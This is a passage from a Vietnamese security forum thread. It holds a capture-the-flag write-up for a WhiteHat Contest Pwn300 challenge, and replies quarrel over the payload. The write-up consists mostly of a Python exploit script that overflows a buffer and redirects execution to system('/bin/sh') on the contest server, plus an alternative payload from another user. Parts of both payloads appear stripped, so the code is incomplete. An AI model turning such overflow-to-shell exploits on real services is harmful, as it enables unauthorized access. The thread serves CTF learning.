[WhiteHat Contest 10] Writeup Pwn300

Tesla123 · 05/08/2015

Bài Pwn300 này không quá khó để khai thác.
Lỗi nằm xảy ra khi parsing 2 tag : và tag . Chi tiết như thế nào, thì các bợn mở ra và reverse lại thì sẽ hiểu

. Và tất nhiên bài này khai thác cũng không quá khó

.
Mã khai thác của mình:

PHP:

#!/usr/bin/python
from Pwn import *
# from Shellcode import *
p = Pwn(mode=1,host='lab33.wargame.whitehat.vn',port=10300)
def exploit():
      payload = '' + 'A'*127 + '' + '/bin/sh;' + 'C'*120
      payload+= p.pack(0x400A40)[:3] # system
      payload+= ''
      
      p.connect() # ok start to exploit
      p.send(payload)
      p.io() # interact with socket
exploit()

Tải mã khai thác ở đây : https://gist.github.com/peternguyen93/f2e5cd0685dbd3849010.

HackersWhoGrill

Re: [WhiteHat Contest 10] Writeup Pwn300

clgt? như này đơn giản hơn không

PHP:

payload  = ""
payload += "test"
payload += ""
payload += "xfd" * 0x81 + "x0bx40A"
payload += ""

Tesla123

Re: [WhiteHat Contest 10] Writeup Pwn300

HackersWhoGrill;27144 đã viết:
clgt? như này đơn giản hơn không

PHP:

payload = "" payload += "test" payload += "" payload += "xfd" * 0x81 + "x0bx40A" payload += ""

thế có khác gì payload của mình không ? Tào lao

HackersWhoGrill

Re: [WhiteHat Contest 10] Writeup Pwn300

Tesla123;27145 đã viết:
thế có khác gì payload của mình không ? Tào lao

Kém tắm vật

Tesla123

Re: [WhiteHat Contest 10] Writeup Pwn300

HackersWhoGrill;27146 đã viết:
Kém tắm vật

CỘNG ĐỒNG AN NINH MẠNG VIỆT NAM

[WhiteHat Contest 10] Writeup Pwn300

Tesla123

VIP Members

[WhiteHat Contest 10] Writeup Pwn300

Tesla123

VIP Members

Số người đang xem

Thống kê diễn đàn